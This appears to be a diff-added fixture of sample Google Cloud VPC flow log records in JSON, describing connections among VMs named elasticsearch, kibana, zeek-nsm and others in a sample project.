+{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"67.43.156.13","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"67.43.156.14","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pro
ject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"67.43.156.13","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"
758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"67.43.156.13","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_i
d":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"67.43.156.13","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"67.43.156.13","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","
subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"67.43.156.13","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
